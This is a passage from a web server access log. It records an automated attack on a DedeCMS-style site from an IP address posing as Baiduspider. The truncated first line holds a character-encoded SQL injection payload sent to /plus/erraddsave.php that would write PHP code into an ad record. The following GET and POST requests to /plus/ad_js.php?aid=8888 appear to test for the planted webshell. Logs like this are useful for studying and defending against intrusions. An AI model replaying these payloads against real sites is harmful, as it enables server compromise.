98&arrs2[]=67&arrs2[]=104&arrs2[]=105&arrs2[]=89&arrs2[]=88&arrs2[]=78&arrs2[]=108&arrs2[]=78&arrs2[]=106&arrs2[]=82&arrs2[]=102&arrs2[]=90&arrs2[]=71&arrs2[]=86&arrs2[]=106&arrs2[]=98&arrs2[]=50&arrs2[]=82&arrs2[]=108&arrs2[]=75&arrs2[]=67&arrs2[]=82&arrs2[]=102&arrs2[]=85&arrs2[]=107&arrs2[]=86&arrs2[]=82&arrs2[]=86&arrs2[]=85&arrs2[]=86&arrs2[]=84&arrs2[]=86&arrs2[]=70&arrs2[]=116&arrs2[]=54&arrs2[]=77&arrs2[]=70&arrs2[]=48&arrs2[]=112&arrs2[]=75&arrs2[]=81&arrs2[]=61&arrs2[]=61&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=44&arrs2[]=48&arrs2[]=41&arrs2[]=59&arrs2[]=125&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0 HTTP/1.1" 404 73 "https://www.ysfine.com//plus/erraddsave.php?dopost=saveedit&a=b&arrs1[]=99&c=d&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&ar
107.189.31.198 - - [16/Feb/2023:05:24:49 -0800] "GET /plus/ad_js.php?aid=8888&nocache=1 HTTP/1.1" 404 73 "https://www.ysfine.com//plus/ad_js.php?aid=8888&nocache=1" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "www.ysfine.com"
107.189.31.198 - - [16/Feb/2023:05:24:49 -0800] "POST /plus/ad_js.php?aid=8888 HTTP/1.1" 404 73 "https://www.ysfine.com//plus/ad_js.php?aid=8888" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "www.ysfine.com"
